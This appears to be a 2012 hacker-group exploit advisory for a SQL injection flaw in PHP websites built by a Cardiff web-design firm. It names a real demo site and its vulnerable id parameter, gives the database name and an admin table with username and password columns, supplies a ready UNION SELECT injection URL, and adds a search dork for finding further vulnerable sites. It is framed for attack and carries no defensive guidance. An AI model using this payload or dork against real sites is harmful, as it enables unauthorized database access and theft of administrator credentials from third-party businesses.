Website Deisgn Cardiff suffers from a remote SQL injection vulnerability.
9fb16c16ea10f1e8ab6415d84c27188754c2862797de36e6bc36d57da8055092
########################################################
~ Exploit Title: *
Website Design Cardiff
SQL Injection *
~ Author: Th4 MasK
~ Vendor : http://www.ep-projects.co.uk/
~ Date : 24.04.2012 ~
~ Platform : Php ~
~ Test On : BackTrack 5
~
Dork : created by Website Design Cardiff
//
~ Demo Site :
http://www.cardiffscuba.co.uk/viewdivetrip.php?id=11 [SQL]
Database : db373049730
Tables : shop_admin
Columns : admin_name,admin_pass
Exploit ;
http://www.cardiffscuba.co.uk/viewdivetrip.php?id=11+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9--
************************************************ **************
* Greetz: http://TurkWebSecurity.Net ~ DarkDevilZ.iN ~ SanalHarekat.Org*
* Contact to ; th4_mask[at]windowslive.com *
* Darkness Devil,DeaDSLayeR,MuHuR,Evillord,Karatay *
************************************************ **************